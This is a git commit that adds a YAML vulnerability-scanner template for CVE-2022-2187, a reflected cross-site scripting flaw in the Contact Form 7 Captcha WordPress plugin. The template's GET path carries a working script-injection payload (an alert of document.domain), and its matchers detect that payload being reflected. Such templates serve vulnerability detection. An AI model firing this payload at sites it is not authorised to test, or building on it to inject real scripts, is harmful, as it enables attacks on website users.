Merge pull request #4852 from For3stCo1d/CVE-2022-2187

Create CVE-2022-2187.yaml
2022-07-18 12:47:58 +05:30 · 2022-07-18 12:47:58 +05:30 · 61296778d6
parent 4def56dcd6 b7548c5ad9
commit 61296778d6
1 changed files with 36 additions and 0 deletions
--- a/cves/2022/CVE-2022-2187.yaml
+++ b/cves/2022/CVE-2022-2187.yaml
@ -0,0 +1,36 @@
+id: CVE-2022-2187
+
+info:
+  name: Contact Form 7 Captcha < 0.1.2 - Reflected Cross-Site Scripting
+  author: For3stCo1d
+  severity: medium
+  description: |
+    The Contact Form 7 Captcha WordPress plugin before 0.1.2 does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute, which could lead to Reflected Cross-Site Scripting in old web browsers
+  reference:
+    - https://wpscan.com/vulnerability/4fd2f1ef-39c6-4425-8b4d-1a332dabac8d
+    - https://wordpress.org/plugins/contact-form-7-simple-recaptcha
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2187
+  tags: cve,cve2022,wordpress,xss,wp-plugin,wp
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-admin/options-general.php?page=cf7sr_edit&"></script><script>alert(document.domain)</script>'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "</script><script>alert(document.domain)</script>"
+          - "Contact Form 7"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200